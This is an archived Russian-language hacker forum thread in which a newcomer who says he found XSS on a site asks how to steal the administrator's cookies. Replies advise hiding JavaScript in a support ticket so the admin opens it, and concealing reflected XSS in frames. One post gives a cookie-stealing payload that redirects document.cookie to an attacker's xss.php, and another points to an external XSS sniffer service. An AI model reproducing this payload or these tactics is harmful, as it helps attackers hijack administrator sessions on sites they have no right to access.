Просмотр полной версии : как достать куки админа ? (xss)
http://i.imgur.com/t0LI7cE.png
всем привет, я хочу изучать xss, читал статьи в форуме, но так и не нашел ответ моего вопроса... Так, я нашел xss в сайте, но дальше не знаю как достать куки админа и так далее... если можно скиньте ссылку на видео или хорошую статью про xss.
заранее спасибо
Ну, если XSS активная, то нужно встроить (например) как изображение и впарить страницу с JS кодом админу, потом получить куки. (К примеру тикеты. Отправляешь тикет с каким-то нейтральным текстом и встраиваешь туда JS код. Не догадаются, проверенно).
Если же пассивная - тут сложней. Придётся напрямую впаривать ссылку ему с JS кодом, а он может понять и не перейти. Такие дела. Эксплуатация XSS вообще штука простая.
↑ (https://antichat.live/posts/3978498/)
Ну, если XSS активная, то нужно встроить (например) как изображение и впарить страницу с JS кодом админу, потом получить куки. (К примеру тикеты. Отправляешь тикет с каким-то нейтральным текстом и встраиваешь туда JS код. Не догадаются, проверенно).
Если же пассивная - тут сложней. Придётся напрямую впаривать ссылку ему с JS кодом, а он может понять и не перейти. Такие дела. Эксплуатация XSS вообще штука простая.
a как понять XSS активная или пассивная ?
↑ (https://antichat.live/posts/3978498/)
Ну, если XSS активная, то нужно встроить (например) как изображение и впарить страницу с JS кодом админу, потом получить куки. (К примеру тикеты. Отправляешь тикет с каким-то нейтральным текстом и встраиваешь туда JS код. Не догадаются, проверенно).
Если же пассивная - тут сложней. Придётся напрямую впаривать ссылку ему с JS кодом, а он может понять и не перейти. Такие дела. Эксплуатация XSS вообще штука простая.
активные и пассивные? ты уверен?
↑ (https://antichat.live/posts/3978509/)
активные и пассивные? ты уверен?
наверно он не про xss
на 9 из 10 постов про xss хочется кидать линк, хотя бы на вики
https://ru.wikipedia.org/wiki/Межсайтовый_скриптинг (https://ru.wikipedia.org/wiki/%D0%9C%D0%B5%D0%B6%D1%81%D0%B0%D0%B9%D1%82%D0%BE%D 0%B2%D1%8B%D0%B9_%D1%81%D0%BA%D1%80%D0%B8%D0%BF%D1 %82%D0%B8%D0%BD%D0%B3)
может прочтут
"если можно скиньте ссылку на видео или хорошую статью про xss."
блитц вроде что то такое говорил, "машину купил, права купил, ездить не купил"
то есть в интернетах вы не нашли ни одного описания, ни одного примера использования xss? пздц
Если в GET:
document.location=('http://ip/xss.php? (http://ip/xss.php)' + document.cookie);
Если в POST:
забить
↑ (https://antichat.live/posts/3978546/)
Если в GET:
document.location=('
http://ip/xss.php? (http://ip/xss.php)
' + document.cookie);
Если в POST:
забить
да ну? иногда лучше жевать
M_script
28.04.2016, 06:14
↑ (https://antichat.live/posts/3978498/)
Если же пассивная - тут сложней. Придётся напрямую впаривать ссылку ему с JS кодом
Никто так не делает. Пассивки во фреймах прячутся.
↑ (https://antichat.live/posts/3978509/)
активные и пассивные? ты уверен?
Не надо новичков путать. Пусть сначала поймут суть, а потом уже с классификацией разбираются.
Ачат появился раньше, чем классификация сторед/рефлектед/ДОМ стала общепринятой. Во всех статьи у нас XSS делятся именно на активки/пассивки.
powerOfthemind
28.04.2016, 12:13
Кто-то может поделиться снифером для xss или код скинуть? Буду благодарен
↑ (https://antichat.live/posts/3978575/)
да ну? иногда лучше жевать
Как там на жердочке?)
nick_sale
01.05.2016, 09:39
↑ (https://antichat.live/posts/3978677/)
Кто-то может поделиться снифером для xss или код скинуть? Буду благодарен
Держи http://kanick.ru/sniffer/ . Когда-то им пользовался. Не знаю,как сейчас,но раньше работал на ура,скорее всего и сейчас тоже)
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot